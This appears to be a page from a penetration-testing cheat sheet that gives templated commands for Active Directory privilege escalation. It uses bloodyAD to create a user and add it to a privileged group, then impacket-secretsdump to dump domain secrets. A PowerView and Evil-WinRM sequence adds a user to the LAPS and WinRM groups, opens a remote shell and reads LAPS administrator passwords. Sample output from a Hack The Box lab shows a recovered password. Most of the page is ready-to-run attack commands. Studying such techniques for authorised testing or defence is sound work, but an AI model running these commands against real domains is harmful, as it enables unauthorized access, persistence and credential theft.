Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Authentication Method
Create a New User Account and Add it to Privilege Group
1. Create a New User Account
# Password
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO# NTLM
bloodyAD -d '<DOMAIN>' -u '<USER>' -p ':<HASH>' -f rc4 --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO# Password-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' -k --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO# NTLM-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<HASH>' -f rc4 -k --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO# Ticket-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -k --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO2. Add the New User to Privilege Group
# Password
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output:
TO-DO# NTLM
bloodyAD -d '<DOMAIN>' -u '<USER>' -p ':<HASH>' -f rc4 --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output:
TO-DO# Password-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' -k --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output:
TO-DO# NTLM-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<HASH>' -f rc4 -k --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output:
TO-DO# Ticket-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -k --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output:
TO-DO3. Secrets Dump
# Password
impacket-secretsdump '<DOMAIN>/<NEW_USER>:<NEW_PASSWORD>@<TARGET>'
Sample Output:
TO-DO# NTLM
impacket-secretsdump '<DOMAIN>/<NEW_USER>@<TARGET>' -hashes :<HASH>
Sample Output:
TO-DO# Password-based Kerberos
impacket-secretsdump '<DOMAIN>/<NEW_USER>:<NEW_PASSWORD>@<TARGET>' -k
Sample Output:
TO-DO# NTLM-based Kerberos
impacket-secretsdump '<DOMAIN>/<NEW_USER>@<TARGET>' -hashes :<HASH> -k
Sample Output:
TO-DO# Ticket-based Kerberos
impacket-secretsdump '<DOMAIN>/<NEW_USER>@<TARGET>' -k
Sample Output:
TO-DO1. Import PowerView.ps1
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
2. Create a New User Password Object
$new_user_password = ConvertTo-SecureString '<NEW_USER_PASSWORD>' -AsPlainText -Force
Sample Output:
*Evil-WinRM* PS C:\programdata> $new_user_password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force
3. Create a New User Account
New-AdUser '<NEW_USER>' -enabled $true -accountpassword $new_user_password
Sample Output:
*Evil-WinRM* PS C:\programdata> New-AdUser 'alice' -enabled $true -accountpassword $new_user_password
4. Add the New User to LAPS Group
Add-DomainGroupMember -Identity 'LAPS READ' -Members '<NEW_USER>'
Sample Output:
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'LAPS READ' -Members 'alice'
5. Add the New User to WinRM Group
Add-DomainGroupMember -Identity 'WinRM' -Members '<NEW_USER>'
Sample Output:
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity WinRM -Members 'alice'
6. Remote as New User
# Password
evil-winrm -i <TARGET> -u '<NEW_USER>' -p '<NEW_USER_PASSWORD>'
Sample Output:
$ evil-winrm -i 127.0.0.1 -u alice -p 'Test1234'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alice\Documents>
# NTLM
evil-winrm -i <TARGET> -u '<NEW_USER>' -H '<NEW_HASH>'
Sample Output:
TO-DO# Ticket-based Kerberos
evil-winrm -i <TARGET> -r <DOMAIN>
Sample Output:
TO-DO7. Read LAPS Password
Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd
Sample Output:
*Evil-WinRM* PS C:\Users\alice\Documents> Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd
DistinguishedName : CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb
DNSHostName : PivotAPI.LicorDeBellota.htb
Enabled : True
ms-Mcs-AdmPwd : 82SD67Cuq34TPZm4mnFo
Name : PIVOTAPI
ObjectClass : computer
ObjectGUID : 98783674-e6a3-4d9e-87e3-efe5f31fabbf
SamAccountName : PIVOTAPI$
SID : S-1-5-21-842165252-2479896602-2762773115-1004
UserPrincipalName :